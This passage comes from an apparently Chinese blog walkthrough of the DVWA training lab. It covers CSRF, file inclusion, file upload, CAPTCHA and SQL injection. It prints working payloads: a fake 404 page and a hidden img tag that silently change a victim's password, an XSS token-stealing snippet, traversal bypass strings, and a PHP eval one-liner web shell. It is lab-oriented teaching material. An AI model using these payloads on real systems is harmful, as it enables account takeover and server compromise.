invoke__">md5</span>( <span class="variable">$pass_new</span> );</span><br><span class="line"></span><br><span class="line"> <span class="comment">// Update the database</span></span><br><span class="line"> <span class="variable">$insert</span> = <span class="string">"UPDATE `users` SET password = '<span class="subst">$pass_new</span>' WHERE user = '"</span> . <span class="title function_ invoke__">dvwaCurrentUser</span>() . <span class="string">"';"</span>;</span><br><span class="line"> <span class="variable">$result</span> = <span class="title function_ invoke__">mysqli_query</span>(<span class="variable">$GLOBALS</span>[<span class="string">"___mysqli_ston"</span>], <span class="variable">$insert</span> ) <span class="keyword">or</span> <span class="keyword">die</span>( <span class="string">'<pre>'</span> . ((<span class="title function_ invoke__">is_object</span>(<span class="variable">$GLOBALS</span>[<span class="string">"___mysqli_ston"</span>])) ? <span class="title function_ invoke__">mysqli_error</span>(<span class="variable">$GLOBALS</span>[<span class="string">"___mysqli_ston"</span>]) : ((<span class="variable">$___mysqli_res</span> = <span class="title function_ invoke__">mysqli_connect_error</span>()) ? <span class="variable">$___mysqli_res</span> : <span class="literal">false</span>)) . <span class="string">'</pre>'</span> );</span><br><span class="line"></span><br><span class="line"> <span class="comment">// Feedback for the user</span></span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"<pre>Password Changed.</pre>"</span>;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">else</span> {</span><br><span class="line"> <span class="comment">// Issue with passwords matching</span></span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"<pre>Passwords did not match.</pre>"</span>;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> ((<span class="title function_ invoke__">is_null</span>(<span class="variable">$___mysqli_res</span> = <span class="title function_ invoke__">mysqli_close</span>(<span class="variable">$GLOBALS</span>[<span class="string">"___mysqli_ston"</span>]))) ? <span class="literal">false</span> : <span class="variable">$___mysqli_res</span>);</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure><p><strong>1.low</strong></p><p>没有任何防护,可以直接通过url进行修改密码。可以通过“短链接”+“社工”的方式,诱惑受害人点击此链接,从而成功修改密码。</p><p>短链接在线生成:<a href="http://tool.chinaz.com/tools/dwz.aspx">http://tool.chinaz.com/tools/dwz.aspx</a></p><p><code>password_new=123&password_conf=123&Change=Change#</code></p><p>可以伪装成恶意网页,进行欺骗攻击</p><figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag"><<span class="name">h1</span>></span>404<span class="tag"><<span class="name">h1</span>></span></span><br><span class="line"></span><br><span class="line"><span class="tag"><<span class="name">a</span> <span class="attr">href</span>=<span class="string">"http://49.232.78.252:81/vulnerabilities/csrf/?password_new=hack&password_conf=hack&Change=Change#"</span>></span>W3School<span class="tag"></<span class="name">a</span>></span></span><br><span class="line"><span class="tag"><<span class="name">h2</span>></span>file not found.<span class="tag"><<span class="name">h2</span>></span></span><br></pre></td></tr></table></figure><p><img src="https://s2.loli.net/2022/01/22/OjBAm5R8tiwXnZr.png" alt="image-20220122223437202"></p><p>受害者点开链接之后,密码已被修改。</p><p>网上还有一种攻击方式:</p><figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag"><<span class="name">img</span> <span class="attr">src</span>=<span class="string">"http://192.168.50.100/dvwa/vulnerabilities/csrf/?password_new=hack&password_conf=</span></span></span><br><span class="line"><span class="string"><span class="tag">hack&Change=Change#"</span> <span class="attr">border</span>=<span class="string">"0"</span> <span class="attr">style</span>=<span class="string">"display:none;"</span>/></span></span><br></pre></td></tr></table></figure><p>打开网页文件即可,不用点击链接。但是已经多次实践未成功。</p><p><strong>2.medium</strong></p><p><img src="https://s2.loli.net/2022/01/22/dFcy4R35UlPAQhL.png" alt="image-20220122214135985"></p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">// Checks to see where the request came <span class="keyword">from</span></span><br><span class="line"><span class="keyword">if</span>( stripos( $_SERVER[ <span class="string">'HTTP_REFERER'</span> ] ,$_SERVER[ <span class="string">'SERVER_NAME'</span> ]) !== false ) {</span><br><span class="line"> // Get <span class="built_in">input</span></span><br><span class="line"> $pass_new = $_GET[ <span class="string">'password_new'</span> ];</span><br><span class="line"> $pass_conf = $_GET[ <span class="string">'password_conf'</span> ];</span><br></pre></td></tr></table></figure><p>对referer进行了检查</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">GET /vulnerabilities/csrf/?password_new=123&password_conf=123&Change=Change HTTP/1.1</span><br><span class="line">Host: 49.232.78.252:81</span><br><span class="line">User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0</span><br><span class="line">Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8</span><br><span class="line">Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2</span><br><span class="line">Connection: close</span><br><span class="line">Referer: http://49.232.78.252:81/vulnerabilities/csrf/</span><br><span class="line">Cookie: PHPSESSID=9mjbjlhio6pup4mq4ne932fbo2; security=medium</span><br><span class="line">Upgrade-Insecure-Requests: 1</span><br></pre></td></tr></table></figure><p>添加referer之后便可成功修改密码</p><p><img src="https://s2.loli.net/2022/01/22/ZP2QKjzx9t3iVHB.png" alt="image-20220122220656993"></p><p>或者对referer根据判断条件进行伪造</p><p><strong>3.high</strong></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/DVWA/vulnerabilities/csrf/?password_new=1234&password_conf=1234&Change=Change&user_token=367c7e82e1c3e847203981e6d36ced78#</span><br></pre></td></tr></table></figure><p>在url后面添加了token</p><p>通过XSS弹出token</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><img src="../csrf"onload=alert(frames[0].document.getElementsByName('user_token')[0].value)></span><br><span class="line">或者</span><br><span class="line"><iframe src="../csrf"onload=alert(frames[0].document.getElementsByName('user_token')[0].value)></span><br></pre></td></tr></table></figure><p><img src="https://s2.loli.net/2022/01/22/ntNWvyJiuKwmsx6.png" alt="image-20220122224913629"></p><p>在URL后面加上通过XSS窃取的token,即可攻击成功。</p><h3 id="文件包含"><a href="#文件包含" class="headerlink" title="文件包含"></a>文件包含</h3><p><strong>1.low</strong></p><p><img src="https://s2.loli.net/2022/01/23/jhqoLdEO8ty93Fk.png" alt="image-20220123153556747"></p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"></span><br><span class="line"><span class="comment">// The page we wish to display</span></span><br><span class="line"><span class="variable">$file</span> = <span class="variable">$_GET</span>[ <span class="string">'page'</span> ];</span><br><span class="line"></span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure><p><img src="https://s2.loli.net/2022/01/23/4QoKAw3WLFcR19V.png" alt="image-20220123154324075"></p><p>可以直接读取phpinfo</p><p>本地文件包含:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/DVWA/vulnerabilities/fi/?page=D:\\wamp\\www\\DVWA\\phpinfo.php</span><br></pre></td></tr></table></figure><p>远程文件包含:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/DVWA/vulnerabilities/fi/?page=http://127.0.0.1//DVWA//about.php</span><br></pre></td></tr></table></figure><p>也可以通过php协议读取。</p><p><img src="https://s2.loli.net/2022/01/23/drFse42uZlUKTvQ.png" alt="image-20220123155108903"></p><p><strong>2.medium</strong></p><p>对输入进行了验证,对不法字符进行替换。</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Input validation</span></span><br><span class="line"><span class="variable">$file</span> = <span class="title function_ invoke__">str_replace</span>( <span class="keyword">array</span>( <span class="string">"http://"</span>, <span class="string">"https://"</span> ), <span class="string">""</span>, <span class="variable">$file</span> );</span><br><span class="line"><span class="variable">$file</span> = <span class="title function_ invoke__">str_replace</span>( <span class="keyword">array</span>( <span class="string">"../"</span>, <span class="string">"..\""</span> ), <span class="string">""</span>, <span class="variable">$file</span> );</span><br></pre></td></tr></table></figure><p><code>str_replace</code>函数是不安全的,可以采用双写进行绕过。</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/DVWA/vulnerabilities/fi/?page=htthttp://p://127.0.0.1//123.txt</span><br></pre></td></tr></table></figure><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/DVWA/vulnerabilities/fi/?page=....//....//....//123.txt</span><br></pre></td></tr></table></figure><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/DVWA/vulnerabilities/fi/?page=..././..././..././123.txt</span><br></pre></td></tr></table></figure><p><strong>3.high</strong></p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"></span><br><span class="line"><span class="comment">// The page we wish to display</span></span><br><span class="line"><span class="variable">$file</span> = <span class="variable">$_GET</span>[ <span class="string">'page'</span> ];</span><br><span class="line"></span><br><span class="line"><span class="comment">// Input validation</span></span><br><span class="line"><span class="keyword">if</span>( !<span class="title function_ invoke__">fnmatch</span>( <span class="string">"file*"</span>, <span class="variable">$file</span> ) && <span class="variable">$file</span> != <span class="string">"include.php"</span> ) {</span><br><span class="line"> <span class="comment">// This isn't the page we want!</span></span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"ERROR: File not found!"</span>;</span><br><span class="line"> <span class="keyword">exit</span>;</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/DVWA/vulnerabilities/fi/?page=file://D://wamp//install.txt</span><br></pre></td></tr></table></figure><p>payload如下:</p><p>新建文件123.txt</p><figure class="highlight txt"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><?php</span><br><span class="line">phpinfo();</span><br><span class="line">?></span><br><span class="line">hello world</span><br><span class="line">@@@@@</span><br></pre></td></tr></table></figure><p><img src="https://s2.loli.net/2022/01/23/JXWfPOl2ZY41ybk.png" alt="image-20220123200007635"></p><h3 id="文件上传"><a href="#文件上传" class="headerlink" title="文件上传"></a>文件上传</h3><p><strong>1.low</strong></p><p>无任何限制,可直接上传文件</p><p>但是对文件大小做了限制,可以在前端进行修改。</p><p>上传一句话木马,然后用get传参进行攻击。</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/DVWA/hackable/uploads/cmd.php?cmd=system(%22dir%22);</span><br></pre></td></tr></table></figure><p><strong>2.medium</strong></p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>( <span class="keyword">isset</span>( <span class="variable">$_POST</span>[ <span class="string">'Upload'</span> ] ) ) {</span><br><span class="line"> <span class="comment">// Where are we going to be writing to?</span></span><br><span class="line"> <span class="variable">$target_path</span> = DVWA_WEB_PAGE_TO_ROOT . <span class="string">"hackable/uploads/"</span>;</span><br><span class="line"> <span class="variable">$target_path</span> .= <span class="title function_ invoke__">basename</span>( <span class="variable">$_FILES</span>[ <span class="string">'uploaded'</span> ][ <span class="string">'name'</span> ] );</span><br><span class="line"></span><br><span class="line"> <span class="comment">// File information</span></span><br><span class="line"> <span class="variable">$uploaded_name</span> = <span class="variable">$_FILES</span>[ <span class="string">'uploaded'</span> ][ <span class="string">'name'</span> ];</span><br><span class="line"> <span class="variable">$uploaded_type</span> = <span class="variable">$_FILES</span>[ <span class="string">'uploaded'</span> ][ <span class="string">'type'</span> ];</span><br><span class="line"> <span class="variable">$uploaded_size</span> = <span class="variable">$_FILES</span>[ <span class="string">'uploaded'</span> ][ <span class="string">'size'</span> ];</span><br><span class="line"></span><br><span class="line"> <span class="comment">// Is it an image?</span></span><br><span class="line"> <span class="keyword">if</span>( ( <span class="variable">$uploaded_type</span> == <span class="string">"image/jpeg"</span> || <span class="variable">$uploaded_type</span> == <span class="string">"image/png"</span> ) &&</span><br><span class="line"> ( <span class="variable">$uploaded_size</span> < <span class="number">100000</span> ) ) {</span><br><span class="line"></span><br><span class="line"> <span class="comment">// Can we move the file to the upload folder?</span></span><br><span class="line"> <span class="keyword">if</span>( !<span class="title function_ invoke__">move_uploaded_file</span>( <span class="variable">$_FILES</span>[ <span class="string">'uploaded'</span> ][ <span class="string">'tmp_name'</span> ], <span class="variable">$target_path</span> ) ) {</span><br><span class="line"> <span class="comment">// No</span></span><br><span class="line"> <span class="keyword">echo</span> <span class="string">'<pre>Your image was not uploaded.</pre>'</span>;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">else</span> {</span><br><span class="line"> <span class="comment">// Yes!</span></span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"<pre><span class="subst">{$target_path}</span> succesfully uploaded!</pre>"</span>;</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">else</span> {</span><br><span class="line"> <span class="comment">// Invalid file</span></span><br><span class="line"> <span class="keyword">echo</span> <span class="string">'<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>'</span>;</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure><p>对文件类型进行了限制,只能上传jpeg/PNG.</p><p>可以通过修改后缀名进行绕过</p><p>首先写一句话木马</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line">@<span class="keyword">eval</span>(<span class="variable">$_REQUEST</span>[<span class="string">'cmd'</span>]);</span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure><p>修改文件名为:cmd.php.jpeg或者cmd.jpeg</p><p>然后通过burpsuite进行抓包,修改文件名,并进行重放。即可上传成功。修改为php后缀。</p><p><img src="https://s2.loli.net/2022/01/23/RplHcGeLoSiq12O.png" alt="image-20220123234346994"></p><p>可以看到,上传成功</p><p><img src="https://s2.loli.net/2022/01/23/W4l5QNShyo8Aawm.png" alt="image-20220123234449958"></p><p>然后用蚁剑连接即可。</p><p>拿下!</p><p><img src="C:\Users\loeoe\AppData\Roaming\Typora\typora-user-images\image-20220123234540979.png" alt="image-20220123234540979"></p><p>也可以直接通过get传参。</p><p><img src="https://s2.loli.net/2022/01/23/B38eH9fJxVuFgYO.png" alt="image-20220123235016536"></p><p><img src="https://s2.loli.net/2022/01/23/49gvm5fWYMH3qzs.png" alt="image-20220123235708181"></p><p><strong>3.high</strong></p><p>或者修改文件头为:GIF89</p><p>制作图片马,进行上传。</p><p>命令:</p><p><img src="https://s2.loli.net/2022/01/24/jsvpPROXce8QZoy.png" alt="image-20220124001307489"></p><p><img src="https://s2.loli.net/2022/01/24/bYmp9LRD1GjkCV2.png" alt="image-20220124000341406"></p><p>然后利用远程文件包含漏洞。或者“命令注入漏洞”。</p><p><img src="https://s2.loli.net/2022/01/24/V8e1XuvZQNDR3Ex.png" alt="image-20220124001628374"></p><h3 id="不安全验证码"><a href="#不安全验证码" class="headerlink" title="不安全验证码"></a>不安全验证码</h3><p>这里需要Google API,实验环境不具备。</p><p>本质上来说,是利用验证码检测的逻辑漏洞,通过修改参数,进行绕过。</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>( <span class="keyword">isset</span>( <span class="variable">$_POST</span>[ <span class="string">'Change'</span> ] ) && ( <span class="variable">$_POST</span>[ <span class="string">'step'</span> ] == <span class="string">'1'</span> ) ) {</span><br><span class="line"> <span class="comment">// Hide the CAPTCHA form</span></span><br><span class="line"> <span class="variable">$hide_form</span> = <span class="literal">true</span>;</span><br><span class="line"></span><br><span class="line"> <span class="comment">// Get input</span></span><br><span class="line"> <span class="variable">$pass_new</span> = <span class="variable">$_POST</span>[ <span class="string">'password_new'</span> ];</span><br><span class="line"> <span class="variable">$pass_conf</span> = <span class="variable">$_POST</span>[ <span class="string">'password_conf'</span> ];</span><br><span class="line"></span><br><span class="line"> <span class="comment">// Check CAPTCHA from 3rd party</span></span><br><span class="line"> <span class="variable">$resp</span> = <span class="title function_ invoke__">recaptcha_check_answer</span>(</span><br><span class="line"> <span class="variable">$_DVWA</span>[ <span class="string">'recaptcha_private_key'</span>],</span><br><span class="line"> <span class="variable">$_POST</span>[<span class="string">'g-recaptcha-response'</span>]</span><br><span class="line"> );</span><br><span class="line"></span><br><span class="line"> <span class="comment">// Did the CAPTCHA fail?</span></span><br><span class="line"> <span class="keyword">if</span>( !<span class="variable">$resp</span> ) {</span><br><span class="line"> <span class="comment">// What happens when the CAPTCHA was entered incorrectly</span></span><br><span class="line"> <span class="variable">$html</span> .= <span class="string">"<pre><br />The CAPTCHA was incorrect. Please try again.</pre>"</span>;</span><br><span class="line"> <span class="variable">$hide_form</span> = <span class="literal">false</span>;</span><br><span class="line"> <span class="keyword">return</span>;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">else</span> {</span><br><span class="line"> <span class="comment">// CAPTCHA was correct. Do both new passwords match?</span></span><br><span class="line"> <span class="keyword">if</span>( <span class="variable">$pass_new</span> == <span class="variable">$pass_conf</span> ) {</span><br><span class="line"> <span class="comment">// Show next stage for the user</span></span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"</span></span><br><span class="line"><span class="string"> <pre><br />You passed the CAPTCHA! Click the button to confirm your changes.<br /></pre></span></span><br><span class="line"><span class="string"> <form action=\"#\" method=\"POST\"></span></span><br><span class="line"><span class="string"> <input type=\"hidden\" name=\"step\" value=\"2\" /></span></span><br><span class="line"><span class="string"> <input type=\"hidden\" name=\"password_new\" value=\"<span class="subst">{$pass_new}</span>\" /></span></span><br><span class="line"><span class="string"> <input type=\"hidden\" name=\"password_conf\" value=\"<span class="subst">{$pass_conf}</span>\" /></span></span><br><span class="line"><span class="string"> <input type=\"submit\" name=\"Change\" value=\"Change\" /></span></span><br><span class="line"><span class="string"> </form>"</span>;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">else</span> {</span><br><span class="line"> <span class="comment">// Both new passwords do not match.</span></span><br><span class="line"> <span class="variable">$html</span> .= <span class="string">"<pre>Both passwords must match.</pre>"</span>;</span><br><span class="line"> <span class="variable">$hide_form</span> = <span class="literal">false</span>;</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>( <span class="keyword">isset</span>( <span class="variable">$_POST</span>[ <span class="string">'Change'</span> ] ) && ( <span class="variable">$_POST</span>[ <span class="string">'step'</span> ] == <span class="string">'2'</span> ) ) {</span><br><span class="line"> <span class="comment">// Hide the CAPTCHA form</span></span><br><span class="line"> <span class="variable">$hide_form</span> = <span class="literal">true</span>;</span><br><span class="line"></span><br><span class="line"> <span class="comment">// Get input</span></span><br><span class="line"> <span class="variable">$pass_new</span> = <span class="variable">$_POST</span>[ <span class="string">'password_new'</span> ];</span><br><span class="line"> <span class="variable">$pass_conf</span> = <span class="variable">$_POST</span>[ <span class="string">'password_conf'</span> ];</span><br><span class="line"></span><br><span class="line"> <span class="comment">// Check to see if both password match</span></span><br><span class="line"> <span class="keyword">if</span>( <span class="variable">$pass_new</span> == <span class="variable">$pass_conf</span> ) {</span><br><span class="line"> <span class="comment">// They do!</span></span><br><span class="line"> <span class="variable">$pass_new</span> = ((<span class="keyword">isset</span>(<span class="variable">$GLOBALS</span>[<span class="string">"___mysqli_ston"</span>]) && <span class="title function_ invoke__">is_object</span>(<span class="variable">$GLOBALS</span>[<span class="string">"___mysqli_ston"</span>])) ? <span class="title function_ invoke__">mysqli_real_escape_string</span>(<span class="variable">$GLOBALS</span>[<span class="string">"___mysqli_ston"</span>], <span class="variable">$pass_new</span> ) : ((<span class="title function_ invoke__">trigger_error</span>(<span class="string">"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work."</span>, E_USER_ERROR)) ? <span class="string">""</span> : <span class="string">""</span>));</span><br><span class="line"> <span class="variable">$pass_new</span> = <span class="title function_ invoke__">md5</span>( <span class="variable">$pass_new</span> );</span><br><span class="line"></span><br><span class="line"> <span class="comment">// Update database</span></span><br><span class="line"> <span class="variable">$insert</span> = <span class="string">"UPDATE `users` SET password = '<span class="subst">$pass_new</span>' WHERE user = '"</span> . <span class="title function_ invoke__">dvwaCurrentUser</span>() . <span class="string">"';"</span>;</span><br><span class="line"> <span class="variable">$result</span> = <span class="title function_ invoke__">mysqli_query</span>(<span class="variable">$GLOBALS</span>[<span class="string">"___mysqli_ston"</span>], <span class="variable">$insert</span> ) <span class="keyword">or</span> <span class="keyword">die</span>( <span class="string">'<pre>'</span> . ((<span class="title function_ invoke__">is_object</span>(<span class="variable">$GLOBALS</span>[<span class="string">"___mysqli_ston"</span>])) ? <span class="title function_ invoke__">mysqli_error</span>(<span class="variable">$GLOBALS</span>[<span class="string">"___mysqli_ston"</span>]) : ((<span class="variable">$___mysqli_res</span> = <span class="title function_ invoke__">mysqli_connect_error</span>()) ? <span class="variable">$___mysqli_res</span> : <span class="literal">false</span>)) . <span class="string">'</pre>'</span> );</span><br><span class="line"></span><br><span class="line"> <span class="comment">// Feedback for the end user</span></span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"<pre>Password Changed.</pre>"</span>;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">else</span> {</span><br><span class="line"> <span class="comment">// Issue with the passwords matching</span></span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"<pre>Passwords did not match.</pre>"</span>;</span><br><span class="line"> <span class="variable">$hide_form</span> = <span class="literal">false</span>;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> ((<span class="title function_ invoke__">is_null</span>(<span class="variable">$___mysqli_res</span> = <span class="title function_ invoke__">mysqli_close</span>(<span class="variable">$GLOBALS</span>[<span class="string">"___mysqli_ston"</span>]))) ? <span class="literal">false</span> : <span class="variable">$___mysqli_res</span>);</span><br><span class="line">}</span><br></pre></td></tr></table></figure><h3 id="SQL注入"><a href="#SQL注入" class="headerlink" title="SQL注入"></a>SQL注入</h3><p><strong>1.low</strong></p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>( <span class="keyword">isset</span>( <span class="variable">$_REQUEST</span>[ <span class="string">'Submit'</span> ] ) ) {</span><br><span class="line"> <span class="comment">// Get input</span></span><br><span class="line"> <span class="variable">$id</span> = <span class="variable">$_REQUEST</span>[ <span class="string">'id'</span> ];</span><br><span class="line"></span><br><span class="line"> <span class="comment">// Check database</span></span><br><span class="line"> <span class="variable">$query</span> = <span class="string">"SELECT first_name, last_name FROM users WHERE user_id = '<span class="subst">$id</span>';"</span>;</span><br><span class="line"> <span class="variable">$result</span> = <span class="title function_ invoke__">mysqli_query</span>(<span class="variable">$GLOBALS</span>[<span class="string">"___mysqli_ston"</span>], <span class="variable">$query</span> ) <span class="keyword">or</span> <span class="keyword">die</span>( <span class="string">'<pre>'</span> . ((<span class="title function_ invoke__">is_object</span>(<span class="variable">$GLOBALS</span>[<span class="string">"___mysqli_ston"</span>])) ? <span class="title function_ invoke__">mysqli_error</span>(<span class="variable">$GLOBALS</span>[<span class="string">"___mysqli_ston"</span>]) : ((<span class="variable">$___mysqli_res</span> = <span class="title function_ invoke__">mysqli_connect_error</span>()) ? <span class="variable">$___mysqli_res</span> : <span class="literal">false</span>)) . <span class="string">'</pre>'</span> );</span><br><span class="line"></span><br><span class="line"> <span class="comment">// Get results</span></span><br><span class="line"> <span class="keyword">while</span>( <span class="variable">$row</span> = <span class="title function_ invoke__">mysqli_fetch_assoc</span>( <span class="variable">$result</span> ) ) {</span><br><span class="line"> <span class="comment">// Get values</span></span><br><span class="line"> <span class="variable">$first</span> = <span class="variable">$row</span>[<span class="string">"first_name"</span>];</span><br><span class="line"> <span class="variable">$last</span> = <span class="variable">$row</span>[<span class="string">"last_name"</span>];</span><br><span class="line"></span><br><span class="line"> <span class="comment">// Feedback for end user</span></span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"<pre>ID: <span class="subst">{$id}</span><br />First name: <span class="subst">{$first}</span><br />Surname: <span class="subst">{$last}</span></pre>"</span>;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="title function_ invoke__">mysqli_close</span>(<span class="variable">$GLOBALS</span>[<span class="string">"___mysqli_ston"</span>]);</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure><p>输入:1’ and 1=1</p><p>报错:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1</span><br></pre></td></tr></table></figure><p>输入:1’ and 1=1 #</p><p><img 